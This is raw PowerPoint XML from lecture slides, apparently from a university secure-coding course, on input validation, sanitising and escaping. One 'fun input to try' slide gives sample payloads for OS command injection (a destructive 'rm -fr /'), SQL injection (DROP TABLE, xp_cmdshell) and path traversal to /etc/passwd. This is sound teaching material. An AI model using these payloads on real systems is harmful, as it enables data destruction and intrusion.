              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, max. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> range?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Luhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>mod 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>check for credit card numbers</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>or strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(dis)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allowed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characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933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words</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>ore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>precise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> checks, eg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regular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expressions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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> context-free grammars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> for  RU student number (s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>followed by 6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>digits),                    valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, URL, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For more complex input formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(eg Flash, JPG, PDF,...)       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>regular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> or grammars are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>expressive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>enough</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ypical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> source of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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812360" y="4437112"/>
            <a:ext cx="1120835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8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err="1"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>ypical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>spec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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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2981"/>
            <a:ext cx="7761288" cy="374441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5776422" y="2751466"/>
            <a:ext cx="1872208" cy="42130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45870" y="2711233"/>
            <a:ext cx="813962" cy="48325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4040" y="1330037"/>
            <a:ext cx="522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Great </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="20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fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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triggering buffer overflows!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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720515" y="1791702"/>
            <a:ext cx="482835" cy="88403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084168" y="1791702"/>
            <a:ext cx="371130" cy="95976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kstvak 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635896" y="5757397"/>
            <a:ext cx="201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IP packet format</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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Oval 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3347864" y="4509120"/>
            <a:ext cx="2880320" cy="42130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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4380879" y="1694731"/>
            <a:ext cx="407145" cy="274238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0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6225"/>
            <a:ext cx="7270576" cy="828676"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>patterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> get  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="4000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>COMPLEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>           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/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>regular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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dirty="0" err="1" smtClean="0"/>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>adressess</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800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800" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>regular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> is more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>precise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>just</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>emailregex.com  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> code samples in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>RFCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>821, 822, 1035, 1123, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2821, 2822</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, 3696, 4291, 5321, 5322,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smtClean="0"/>
              <a:t>5952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try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>yourself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>!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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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8" y="1628800"/>
            <a:ext cx="7977462" cy="23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do with illegal inputs?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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the entire input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1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       Rejecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the input is safer than trying to sanitise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  <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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en-GB" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  offending bits of the input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1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>offending bits in the input          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eg</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean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replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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″</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933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  by  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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\″</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="10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replace </a:t>
            </a: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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933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by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GB" sz="18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GB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GB" sz="18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GB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to prevent HTML/ XML injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="10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replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to prevent XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="10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put quotes around some input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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NB after sanitising, changed input may need to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>re-validated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0774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Fun input to try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Ridiculously long inputs to cause buffer overflows</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/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OS command injection     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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 /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SQL injection                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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’; DROP TABLE Customers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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;--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                                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>erik@ru.nl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Path traversal        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
